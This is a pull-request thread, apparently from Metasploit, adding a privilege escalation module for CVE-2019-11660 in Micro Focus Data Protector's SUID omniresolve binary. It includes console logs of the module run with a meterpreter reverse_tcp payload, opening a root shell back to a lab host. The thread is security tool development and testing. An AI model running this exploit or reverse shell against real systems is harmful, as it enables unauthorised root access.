Add Linux Micro Focus (HPE) Data Protector Privilege Escalation Module (CVE-2019-11660)

[s7u55]

Add Micro Focus (HPE) Data Protector Privilege Escalation Module (CVE-2019-11660).

  This module exploits the trusted $PATH environment
  variable of the SUID binary `omniresolve` in
  Micro Focus (HPE) Data Protector A.10.40 and prior.

  The `omniresolve` executable calls the `oracleasm` binary using
  a relative path and the trusted $PATH, which allows an attacker
  to execute a custom binary with `root` privileges.

[bcoles]

LGTM. Ready for testing.

[s7u55]

Test against Micro Focus Data Protector 10.40

msf5 exploit(multi/handler) > use exploit/linux/local/omniresolve_suid_priv_esc
msf5 exploit(linux/local/omniresolve_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/local/omniresolve_suid_priv_esc) > show options

Module options (exploit/linux/local/omniresolve_suid_priv_esc):

   Name       Current Setting             Required  Description
   ----       ---------------             --------  -----------
   SESSION                                yes       The session to run this module on.
   SUID_PATH  /opt/omni/lbin/omniresolve  yes       Path to suid executable omniresolve


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Micro Focus (HPE) Data Protector <= 10.40 build 118


msf5 exploit(linux/local/omniresolve_suid_priv_esc) > set lhost eth0

msf5 exploit(linux/local/omniresolve_suid_priv_esc) > set session 1
session => 1

msf5 exploit(linux/local/omniresolve_suid_priv_esc) > check
[+] The target is vulnerable.
msf5 exploit(linux/local/omniresolve_suid_priv_esc) > run

[*] Started reverse TCP handler on 192.168.0.108:4444 
[*] Sending stage (3021284 bytes) to 192.168.0.110
[*] Meterpreter session 2 opened (192.168.0.108:4444 -> 192.168.0.110:36754) at 2019-10-03 14:37:43 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.0.110
OS           : CentOS 7.6.1810 (Linux 3.10.0-957.21.2.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

Test against Micro Focus Data Protector 10.50 (Patched version)

msf5 exploit(linux/local/omniresolve_suid_priv_esc) > exploit

[*] Started reverse TCP handler on 192.168.0.108:4444 
[-] omniresolve version 10.40 build 125 is not vulnerable
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable
[*] Exploit completed, but no session was created.
msf5 exploit(linux/local/omniresolve_suid_priv_esc) > 

The vendor changed omniresolve build, but not the version in DP 10.50.

[s7u55]

The older versions are not available on the official website.
I can upload one somewhere if you need.

[bcoles]

The older versions are not available on the official website.
I can upload one somewhere if you need.

Please do. If you don't want to make the link public, you can email myself and/or msfdev[at]metasploit.com .

[s7u55]

The older versions are not available on the official website.
I can upload one somewhere if you need.

Please do. If you don't want to make the link public, you can email myself and/or msfdev[at]metasploit.com .

have you received the link?

[bcoles]

The older versions are not available on the official website.
I can upload one somewhere if you need.

Please do. If you don't want to make the link public, you can email myself and/or msfdev[at]metasploit.com .

have you received the link?

Yes, thanks, I'll take a look between now and Sunday (probably earlier). Please update the ForceExploit functionality, as per above, if you have time.

[bcoles]

Hi @s7u55

Tested successfully on CentOS 7 (x64).

I've made some small changes in c6e739c. I hope you're ok with the changes. Please let me know, else I'll proceed with landing this PR.

The changes mostly consist of:

• minor formatting for module description
• updating ForceExploit as discussed above
• changed @ instance variables to local variables
• appended echo to the cmd_exec call to fix a stupid bug related to framework command tokenisation Command tokenisation is failing on bash command shells #12485 (unrelated to this module) which caused the specified session to die if the session was a command shell session.
• change print_ methods in check to vprint_
• print the omniresolve version in check, regardless of whether the version is vulnerable
• return Appears, rather than Vulnerable, as the vulnerability is inferred, rather than confirmed.

[s7u55]

Hello.
That's perfect, thanks.

[bcoles]

Hello.
That's perfect, thanks.

Cool. Landed in master. Unfortunately I think we've missed the point release for this week. It will be in next week's release.

[bcoles]

Release Notes

Add Micro Focus (HPE) Data Protector Privilege Escalation module for CVE-2019-11660. This module exploits the omniresolve SUID root executable installed as part of Data Protector to gain root privileges by abusing a trusted $PATH.